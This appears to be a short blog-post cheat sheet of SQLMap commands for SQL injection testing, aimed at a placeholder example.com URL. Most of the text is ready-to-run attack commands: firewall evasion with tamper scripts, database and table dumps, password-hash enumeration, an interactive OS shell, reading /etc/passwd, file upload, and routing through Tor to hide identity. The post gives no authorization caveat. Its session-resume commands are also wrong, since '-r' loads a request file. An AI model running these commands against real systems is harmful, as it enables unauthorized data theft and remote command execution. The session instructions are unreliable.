Author: Trix Cyrus
What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.
Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:
sqlmap -u "http://example.com/index.php?id=1"
This command scans the target URL for SQL injection vulnerabilities.
1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs: Lists all available databases on the target server if a vulnerability is found.
2. Specifying POST Requests
For targets that require a POST request (usually in login forms), you can specify the data like this:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3. Bypassing WAFs and Filters
To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.
4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:
sqlmap -u "http://example.com/index.php?id=1" --dbs
Once a database is identified, extract its tables:
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
To get columns from a specific table:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5. Dumping Data
Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6. Enumerating Database Users and Passwords
SQLMap can also be used to enumerate database users and even crack hashed passwords:
sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords
7. Accessing the Operating System
In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
This will provide an interactive shell where you can execute commands on the target system.
8. File Upload and Reading
You can also read files from the target system or upload malicious files (if permitted):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9. Using Tor for Anonymity
To hide your identity, you can run SQLMap through the Tor network:
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.
10. Saving and Resuming Sessions
SQLMap allows you to save and resume your progress by using the --session option:
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Later, you can resume the same session by:
sqlmap -r your_session_name
11. Verbose Mode
To see detailed information about what SQLMap is doing:
sqlmap -u "http://example.com/index.php?id=1" -v 3
The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).
- Automated Scans for Multiple Targets
SQLMap supports scanning multiple URLs stored in a file:
sqlmap -m urls.txt --batch
--batch: Automatically answer all prompts with default options, useful for automated scanning.
also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.
~TrixSec
Top comments (0)